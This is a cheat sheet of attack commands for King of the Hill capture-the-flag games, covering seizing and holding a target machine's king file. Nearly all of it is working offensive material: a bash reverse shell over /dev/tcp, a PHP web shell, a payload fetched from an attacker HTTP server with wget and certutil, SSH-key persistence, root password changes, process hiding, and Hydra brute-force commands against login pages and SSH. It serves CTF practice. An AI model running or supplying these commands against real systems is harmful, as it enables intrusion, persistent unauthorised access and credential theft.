Description: In the King of the Hill (KoTH) Attack-Defence challenge, your goal is to compromise the target machine and gain access to the coveted /root/king.txt file on Linux machines or C:\king.txt (or C:\Users\Administrator\king-server\king.txt) on Windows machines. Once you've successfully breached the system, your task is to maintain access and defend the king file from other players.
- you can check who is on the machine, by using the following command.
ps aux | grep pts
- If you're looking for your pts id/number:
tty
- killing session of other players:
pkill -9 -t pts/$0 # Here $0 = pts/id number
-
If your opponent killing your session, again and again. you can use this command to hide your shell (pts id) on the machine
-
To get the PID of your PTS.
ps aux
- Hide your PTS
mount -o bind /tmp /proc/your-PID-here
if you use this command then your opponent will not be able to kill your session Anymore ;)
- Use this website to generate Reverse shell command (bash,python,PHP,socat)β οΈ
https://www.revshells.com/
- Reverse Shell generator + other Useful commands for basic penetration testingπ οΈ
https://tex2e.github.io/reverse-shell-generator/index.html
- Easy to Remember Reverse shell π oneliner
bash -c "bash -i >& /dev/tcp/0.0.0.0/4444 0>&1"
- Use this github repo to get code of php-reverse-shell.php π
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- GTFoBins is a curated list of Unix binaries that can be used to escalate Privilege:
https://gtfobins.github.io/
- If you're looking for Binaries that has root permissions:
1) find / -perm -u=s -type f 2>/dev/null
2) find / -type f \( -perm -4000 -o -perm -2000 \) -print
3) find / -perm /4000 2>/dev/null
- If you're looking for Binaries that has Sudo permissions:
sudo -l
- If you're looking for Flags:
1) find / -name "user.txt" 2>/dev/null
2) find / -name root.txt 2>/dev/null
3) find / -name .flag 2>/dev/null
- Change the password for the root user and other existing users using one-liners:
1) echo -e "YOURpassword\nYOURpassword" | passwd root
2) echo -e "YOURpassword\nYOURpassword" | passwd user
- protect king.txt using chattr.
[Activate]
chattr +i king.txt
[Deactivate]
chattr -i king.txt
- Use chattr loops to protect lock your name in king.txt
while [ 1 ]; do chattr -ia /root/king.txt 2>/dev/null; echo -n "YourNick" >| /root/king.txt 2>/dev/null; chattr +ia /root/king.txt 2>/dev/null; done &
- Use Chattr for lock /root folder:
cd / && chattr +i root
It is forbidden to change the permission of binaries in Koth Match, for example give a chmod 700 /usr/bin/find, except chattr, the chattr binary is allowed to remove from the machine.( remove from the machine after you use: [Activate] chattr +i king.txt ).
- Remove chattr so no one will be able to change the attributes of king.txt
[Deactivate]
rm /usr/bin/chattr
- but if you have access to a koth box and you don't have chattr you can get a chattr binary from github and compile it on the machine:
wget https://raw.githubusercontent.com/posborne/linux-programming-interface-exercises/master/15-file-attributes/chattr.c
gcc chattr.c -o chattr
./chattr +i king.txt
if you try to put your nick in /root/king.txt and the message "Read-only file system" appears, that means the other player is used Mount technique.
- Unmount king.txt using umount:
umount -l /root
umount -l /root/king.txt
Get Shell by exploiting file upload Vulnerability
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Shell Persistence using SSH - Attacker Terminal & Target Terminal
Step 1: Navigate to the SSH directory on your Target Terminal -
cd /root/.ssh
Step 1.2 :- Return to your attacker Terminal and execute:
cd /root/.ssh
Step 2: Return to your attacker terminal and execute:
ssh-keygen -t rsa
[Attacker Terminal] Step 3: Display the content of id_rsa.pub using cat id_rsa.pub and copy its content using:
cat id_rsa.pub """ <Content> """ > authorized_keys
Example:
[Attacker Terminal] Step 4: Set the permissions for id_rsa -
chmod 600 id_rsa
Attacker Terminal Step 4.1: Send authorized_keys to the target system.:)
[Target Terminal] Step 5: Set permissions for authorized_keys -
chmod 700 authorized_keys
[Attacker Terminal] Step 6: Connect to the target system using the generated key -
ssh -i id_rsa root@127.0.0.1
To avoid the need to re-exploit the host, we stored a copy of the root users id_rsa ssh key on our local machine as key.rsa
Display the content of id_rsa using cat command and copy its content in key.rsa:
cat id_rsa >> key.rsa
To reconnect with the key we executed
ssh -i key.rsa root@0.0.0.0
https://github.com/3ndG4me/AutoBlue-MS17-010
Python3 Server (Attacker Machine)
python3 -m http.server 8080
Get install stuff in linux target
wget http://0.0.0.0:8080/linpeas.sh
Get install stuff in Windows target
certutil.exe -urlcache -f http://0.0.0.0:8080/winpeas.exe
Use Hydra to Brute-Force Login page
hydra -l admin -P passlist.txt www.testphp.vulnweb.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Use Hydra to Brute-Force SSH service
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.0.0.0 ssh